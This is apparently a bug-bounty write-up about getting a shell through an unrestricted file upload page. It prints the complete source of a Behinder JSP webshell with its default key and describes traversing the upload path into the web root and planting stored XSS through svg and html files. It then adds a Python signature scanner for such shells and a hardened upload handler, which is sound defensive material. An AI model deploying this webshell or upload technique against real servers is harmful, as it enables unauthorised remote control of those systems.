Arbitrary file upload vulnerability mining (getshell)
1. During the vulnerability hunt, find the subdomain page.
2. The page shows no content, so scan for directories; this turns up filemanager/, click to visit it.
The upload page was a pleasant surprise.
Sure enough, there is an upload function. Click upload and capture the request. Testing showed that a plain JSP webshell is intercepted and AntSword cannot connect, so I uploaded an Ice Scorpion (Behinder) webshell instead: Behinder encrypts its traffic with AES by default, so the request body carries no plaintext payload for the filter to match.
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
// Minimal class loader: turns the decrypted bytes into a Class at runtime
class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}
%><%
if (request.getMethod().equals("POST")) {
    // Key: first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
    String k = "e45e329feb5d925b";
    session.putValue("u", k);
    // 2 == Cipher.DECRYPT_MODE; "AES" alone resolves to AES/ECB/PKCS5Padding on the JDK
    Cipher c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
    // Body is a single base64 line: decode, AES-decrypt, load as a class, instantiate, hand it the pageContext
    // (sun.misc.BASE64Decoder was removed in JDK 9; java.util.Base64 is the replacement there)
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>
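The shell above is recognisable on disk by a handful of features: runtime defineClass on attacker-supplied bytes, an AES cipher keyed with a 16-character literal, a base64 decoder and a request body read as one line. As an added example (not code from the original post), the Python below derives the Behinder key from a connection password the same way the shell's comment describes, and scans JSP source for that combination of features, flagging the default rebeyond key by name. The JSP strings inside the block are constructed scan inputs: a condensed copy of the shell and a harmless page.

```python
import hashlib
import re

# Constructed input: condensed copy of the Behinder-style JSP shell shown above.
BEHINDER_JSP = r'''<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%! class U extends ClassLoader { U(ClassLoader c){super(c);}
    public Class g(byte[] b){return super.defineClass(b,0,b.length);} } %>
<% if (request.getMethod().equals("POST")) {
    String k = "e45e329feb5d925b"; session.putValue("u", k);
    Cipher c = Cipher.getInstance("AES"); c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder()
        .decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
} %>'''

# Constructed input: a harmless page that uses the request and session too.
BENIGN_JSP = r'''<%@page import="java.util.*" %>
<% String user = (String) session.getAttribute("user");
   if (request.getMethod().equals("POST")) { out.println("hello " + user); } %>'''


def behinder_key(password: str) -> str:
    """Behinder uses the first 16 hex characters of md5(password) as the AES key."""
    return hashlib.md5(password.encode()).hexdigest()[:16]


# (pattern, what it indicates); a shell needs most of these together
SIGNATURES = [
    (r"defineClass\s*\(", "loads a class from raw bytes at runtime"),
    (r'Cipher\.getInstance\s*\(\s*"AES', "AES cipher in page code"),
    (r"SecretKeySpec\s*\(", "hard-coded symmetric key"),
    (r"BASE64Decoder|Base64\.getDecoder", "base64-decodes the request body"),
    (r"request\.getReader\(\)\.readLine\(\)", "reads the whole body as one line"),
    (r"\.newInstance\(\)\.equals\s*\(\s*pageContext", "passes pageContext to the loaded class"),
]


def scan_jsp(source: str, min_hits: int = 3) -> dict:
    """Return the matched indicators and a verdict; min_hits keeps single benign matches quiet."""
    hits = [desc for pattern, desc in SIGNATURES if re.search(pattern, source)]
    if behinder_key("rebeyond") in source:
        hits.append("default Behinder key (md5('rebeyond')[:16]) present")
    return {"hits": hits, "suspicious": len(hits) >= min_hits}


if __name__ == "__main__":
    print(behinder_key("rebeyond"))
    for name, src in (("shell", BEHINDER_JSP), ("benign", BENIGN_JSP)):
        print(name, scan_jsp(src))
```

The threshold matters: a legitimate page may well call Cipher or Base64, but it will not also defineClass bytes taken straight from the request body. Custom-password shells escape the key check but not the structural one, which is why the key is an extra signal rather than the sole test.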
But the upload response does not echo the saved path. I could see the path, so I tried .../upload
You can see that the path exists. After trying .../…/
and accessing it, I found that it happens to be the root directory of the website.
Connecting with Ice Scorpion (Behinder) directly, the connection succeeds.
At this point, getshell is successful.
Of course, you can also upload svg and html files to get stored XSS; I tested this and it works. Nothing restricts what can be uploaded here.
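The three things that made this getshell possible were a filename that is trusted (so a traversal sequence lands the file in the web root), no restriction on file type, and uploads served from the web root itself. As an added example, not code from the original post or the filemanager application, the Python below shows the handler-side checks that close each of those: the filename is reduced to a strict allowlisted form, the content must start with the magic bytes of the declared type (so a JSP renamed to .png is refused), active formats such as svg and html are simply not on the list, and the stored name is chosen by the server under a directory outside the web root. The directory path is a hypothetical default; the byte strings in the test are constructed.

```python
import os
import re
import secrets

# Assumed storage location outside the web root (hypothetical path; set per deployment).
UPLOAD_DIR = "/var/app/uploads"

# Allowlist: extension -> magic bytes the content must begin with.
# svg and html are deliberately absent: they execute script when served inline.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}

# Exactly one base name and one extension; no dots, slashes or spaces in the base.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def check_upload(filename: str, data: bytes):
    """Return (True, ext) for an acceptable upload, otherwise (False, reason)."""
    if any(bad in filename for bad in ("\x00", "/", "\\", "..")):
        return False, "path traversal or separator in filename"
    m = NAME_RE.match(filename)
    if not m:
        return False, "filename not in safe form"
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        return False, "content does not match declared type"
    return True, ext


def storage_path(ext: str, upload_dir: str = UPLOAD_DIR) -> str:
    """Server-chosen random name; the client's filename never reaches the filesystem."""
    return os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}")


def handle_upload(filename: str, data: bytes) -> dict:
    """Validate, then return where the file would be stored and how it should be served."""
    ok, info = check_upload(filename, data)
    if not ok:
        return {"accepted": False, "reason": info}
    content_type = {"png": "image/png", "jpg": "image/jpeg",
                    "jpeg": "image/jpeg", "pdf": "application/pdf"}[info]
    return {
        "accepted": True,
        "path": storage_path(info),
        # Served back with a fixed type and no sniffing, as a download rather than inline.
        "headers": {
            "Content-Type": content_type,
            "X-Content-Type-Options": "nosniff",
            "Content-Disposition": "attachment",
        },
    }


if __name__ == "__main__":
    for name, body in (("../../shell.jsp", b"<%@page"), ("xss.svg", b"<svg"),
                       ("photo.png", b"<%@page"), ("photo.png", b"\x89PNG\r\n\x1a\n")):
        print(name, handle_upload(name, body))
```

Two points the checks rely on: the traversal test runs before the name regex so the log records what the client actually tried, and the magic-byte check is per declared extension, not a generic "is this an image" test, so a PNG header on a file claiming to be a PDF is still refused. Storing under a server-chosen name outside the web root means that even a file that slips past the content check is never reachable as a URL the container would execute.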